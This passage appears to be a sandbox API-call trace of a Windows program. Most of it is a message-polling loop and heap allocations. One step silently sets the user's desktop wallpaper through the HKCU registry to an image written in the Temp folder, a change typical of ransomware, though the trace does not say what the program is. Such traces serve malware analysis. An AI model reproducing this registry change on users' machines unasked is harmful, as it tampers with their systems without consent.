hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.568] Sleep (dwMilliseconds=0xa) [0229.583] timeGetTime () returned 0x1179633 [0229.583] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.583] Sleep (dwMilliseconds=0xa) [0229.598] timeGetTime () returned 0x1179643 [0229.598] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.598] Sleep (dwMilliseconds=0xa) [0229.617] timeGetTime () returned 0x1179652 [0229.617] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.617] Sleep (dwMilliseconds=0xa) [0229.671] timeGetTime () returned 0x1179681 [0229.671] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0229.671] TranslateMessage (lpMsg=0x8cf798) returned 0 [0229.671] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0229.671] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0229.671] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0229.671] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.671] Sleep (dwMilliseconds=0xa) [0229.692] timeGetTime () returned 0x11796a1 [0229.692] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.692] Sleep (dwMilliseconds=0xa) [0229.726] timeGetTime () returned 0x11796c0 [0229.726] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.726] Sleep (dwMilliseconds=0xa) [0229.738] timeGetTime () returned 0x11796cf [0229.738] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.738] Sleep (dwMilliseconds=0xa) [0229.763] timeGetTime () returned 0x11796df [0229.763] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.763] Sleep (dwMilliseconds=0xa) [0229.785] timeGetTime () returned 0x11796fe [0229.785] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.785] Sleep (dwMilliseconds=0xa) [0229.801] timeGetTime () returned 0x117970e [0229.801] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.801] Sleep (dwMilliseconds=0xa) [0229.817] timeGetTime () returned 0x117971e [0229.817] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.817] Sleep (dwMilliseconds=0xa) [0229.834] timeGetTime () returned 0x117972e [0229.834] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.834] Sleep (dwMilliseconds=0xa) [0229.868] timeGetTime () returned 0x117974c [0229.868] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.868] Sleep (dwMilliseconds=0xa) [0229.879] timeGetTime () returned 0x117975c [0229.880] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.880] Sleep (dwMilliseconds=0xa) [0229.895] timeGetTime () returned 0x117976c [0229.895] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.895] Sleep (dwMilliseconds=0xa) [0229.910] timeGetTime () returned 0x117977b [0229.910] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.910] Sleep (dwMilliseconds=0xa) [0229.931] timeGetTime () returned 0x117978b [0229.931] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.931] Sleep (dwMilliseconds=0xa) [0229.943] timeGetTime () returned 0x117979b [0229.943] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.943] Sleep (dwMilliseconds=0xa) [0229.973] timeGetTime () returned 0x11797ba [0229.973] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.973] Sleep (dwMilliseconds=0xa) [0229.989] timeGetTime () returned 0x11797c9 [0229.989] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.989] Sleep (dwMilliseconds=0xa) [0230.004] timeGetTime () returned 0x11797d9 [0230.004] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.004] Sleep (dwMilliseconds=0xa) [0230.020] timeGetTime () returned 0x11797e9 [0230.020] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.020] Sleep (dwMilliseconds=0xa) [0230.036] timeGetTime () returned 0x11797f8 [0230.036] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.036] Sleep (dwMilliseconds=0xa) [0230.051] timeGetTime () returned 0x1179808 [0230.051] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.051] Sleep (dwMilliseconds=0xa) [0230.115] timeGetTime () returned 0x1179846 [0230.115] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.115] Sleep (dwMilliseconds=0xa) [0230.129] timeGetTime () returned 0x1179856 [0230.129] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.129] Sleep (dwMilliseconds=0xa) [0230.152] timeGetTime () returned 0x1179866 [0230.152] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.152] Sleep (dwMilliseconds=0xa) [0230.176] timeGetTime () returned 0x1179885 [0230.176] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.176] Sleep (dwMilliseconds=0xa) [0230.192] timeGetTime () returned 0x1179895 [0230.192] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.192] Sleep (dwMilliseconds=0xa) [0230.209] timeGetTime () returned 0x11798a4 [0230.209] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.209] Sleep (dwMilliseconds=0xa) [0230.223] timeGetTime () returned 0x11798b4 [0230.223] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.223] Sleep (dwMilliseconds=0xa) [0230.239] timeGetTime () returned 0x11798c3 [0230.239] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.239] Sleep (dwMilliseconds=0xa) [0230.255] timeGetTime () returned 0x11798d3 [0230.255] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.255] Sleep (dwMilliseconds=0xa) [0230.270] timeGetTime () returned 0x11798e3 [0230.270] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.270] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0230.270] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0230.270] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0230.270] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0230.270] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0230.270] RegCloseKey (hKey=0x4e0) returned 0x0 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a731e8 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0230.271] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0230.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0230.271] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0230.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0230.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0230.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0230.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0230.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0230.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0230.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0230.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0230.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0230.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0230.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0230.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0230.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab590 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0230.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0230.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0230.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0230.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0230.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab470 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0230.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0230.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0230.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0230.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0230.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0230.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0230.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0230.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0230.274] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0230.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0230.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0230.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0230.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0230.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0230.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0230.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0230.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0230.274] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0230.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0230.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0230.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0230.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0230.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0230.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0230.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0230.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0230.274] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0230.274] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0230.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0230.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0230.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0230.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0230.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0230.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0230.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0230.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0230.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0230.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 